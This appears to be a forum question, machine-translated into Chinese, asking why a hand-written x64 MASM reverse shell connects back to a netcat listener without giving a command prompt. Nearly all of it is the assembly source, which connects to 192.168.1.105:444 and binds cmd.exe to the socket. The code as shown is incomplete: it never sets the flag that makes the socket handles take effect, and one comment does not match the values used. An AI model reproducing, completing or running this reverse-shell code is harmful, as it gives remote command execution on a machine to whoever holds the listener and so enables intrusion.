我正在尝试编写创建反向连接并将 cmd.exe 绑定到套接字的代码。没有错误 - 我在操作系统中创建了套接字、连接和 cmd 进程,但在使用 netcat 的控制台中,我只看到连接成功,没有操作系统提示:
C:\Users\myuser\NETCAT>nc.exe -lvp 444
监听 [any] 444 ... 从 DESKTOP-2E15R3U [192.168.1.105] 18433 连接到 [192.168.1.105]
我忘记在代码中做什么来成功绑定 сmd 和套接字?
;ml64.exe reverse_tcp_MASM.asm /link /subsystem:console /entry:main /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\Lib\10.0.18362.0\um\x64" /defaultlib:kernel32.lib /defaultlib:WS2_32.lib
extrn CreateProcessA : proc
extrn ExitProcess : proc
extern WSAStartup : proc
extern WSASocketA : proc
extern connect : proc
PROCESS_INFORMATION struct
hProcess qword ?
hThread qword ?
dwProcessId dword ?
dwThreadId dword ?
PROCESS_INFORMATION ends
STARTUPINFOA struct
cb qword sizeof ( STARTUPINFOA )
lpReserved qword ?
lpDesktop qword ?
lpTitle qword ?
dwX dword ?
dwY dword ?
dwXSize dword ?
dwYSize dword ?
dwXCountChars dword ?
dwYCountChars dword ?
dwFillAttribute dword ?
dwFlags dword ?
wShowWindow word ?
cbReserved2 word 3 dup ( ? )
lpReserved2 qword ?
hStdInput qword ?
hStdOutput qword ?
hStdError qword ?
STARTUPINFOA ends
.const
NORMAL_PRIORITY_CLASS equ 020h
.data
processInfo PROCESS_INFORMATION <>
startupInfo STARTUPINFOA <>
;szProcName db "C:\Windows\System32\calc.exe", 00h
szProcName db "C:\Windows\System32\cmd.exe", 00h
.code
main proc
;--------------------------------------
;WSAStartup(514,&WSADATA))
and rsp,0FFFFFFFFFFFFFFF0h
sub rsp,20h
xor rdx,rdx
mov dx,408h ;
sub rsp,rdx
lea rdx,[rsp]
xor rcx,rcx
sub rsp,88h
mov cx,514
call WSAStartup
;-------------------------------------------------------
;WSASocketA(2,1,6,0,0,0)
mov dword ptr [rsp+28h],0
mov dword ptr [rsp+20h],0
mov r9d,0
mov r8d,6
mov edx,1
mov ecx,2
call WSASocketA
mov r13,rax ;r13=SOCKET
;-------------------------------------------
;connect(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
and rsp,0FFFFFFFFFFFFFFF0h
sub rsp,28h
xor r8,r8
push r8
push r8
mov [rsp], byte ptr 2
mov [rsp+2],word ptr 0bc01h ;port 444
mov [rsp+4],dword ptr 6901a8c0h ;192.168.1.105
lea r12,[rsp]
sub rsp,88
c:
mov rdx,r12 ; struct <2, 0bb01h, 6801a8c0h>
mov rcx,r13 ; SOCKET
mov r8b,10h ; 16 bytes
call connect
xor r8,r8
cmp rax,r8
jnz c
;-------------------------------------------
;CreateProcessA
sub RSP, 28h
and RSP, 0FFFFFFFFFFFFFFF0h
lea rbx, startupInfo
mov dword ptr [rbx],68h
mov qword ptr [rbx+50h],r13
mov qword ptr [rbx+58h],r13
mov qword ptr [rbx+60h],r13
lea rax, processInfo
push rax
push rbx
push 00h
push 00h
push NORMAL_PRIORITY_CLASS
push 00h
sub rsp, 20h
mov r9, 00h
mov r8, 00h
mov rdx, 00h
lea rcx, szProcName
call CreateProcessA
xor rcx, rcx
call ExitProcess
main endp
end